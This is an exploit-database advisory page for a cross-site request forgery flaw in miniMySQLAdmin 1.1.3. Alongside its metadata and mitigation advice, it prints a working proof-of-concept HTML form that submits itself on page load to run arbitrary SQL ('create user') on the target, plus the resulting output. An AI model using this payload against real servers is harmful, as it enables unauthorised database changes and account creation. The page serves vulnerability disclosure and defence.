miniMySQLAdmin 1.1.3 - CSRF(Execute SQL Query)

vendor:

miniMySQLAdmin

by:

HaHwul

7,5

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: miniMySQLAdmin

Affected Version From: 1.1.3

Affected Version To: 1.1.3

Patch Exists: NO

Related CWE: none

CPE: a:xdsoft:minimysqladmin:1.1.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Debian [wheezy]

2016

miniMySQLAdmin 1.1.3 – CSRF(Execute SQL Query)

miniMySQLAdmin is vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can craft a malicious HTML page that contains a form with hidden fields that can be used to execute arbitrary SQL queries on the vulnerable server. This can be used to create a new user with full privileges.

Mitigation:

Implementing CSRF protection tokens, validating the HTTP Referer header, and using CAPTCHAs can help mitigate CSRF attacks.

Source

Exploit-DB raw data:

<!--
# Exploit Title: miniMySQLAdmin 1.1.3 - CSRF(Execute SQL Query)
# Date: 2016-06-10
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: http://xdsoft.net/minimysqladmin.html
# Software Link: https://github.com/xdan/miniMySQLAdmin/archive/master.zip
# Version: v1.1.3
# Tested on: Debian [wheezy]
# CVE : none
-->

<hr>
<form name="csrf_poc" action="http://192.168.0.14/vul_test/target/miniMySQLAdmin/" method="GET">
<input type="hidden" name="dbname" value="mysql">
<input type="hidden" name="table" value="user">
<input type="hidden" name="sql" value="create user exploit_user">  <!-- SQL Query -->

<input type="submit" value="Replay!">
</form>
<script type="text/javascript">document.forms.csrf_poc.submit();</script>

<!-- 
#### Output ####

#> select * from `user` order by `User` asc  limit 20

Host	User
%      exploit_user1

-->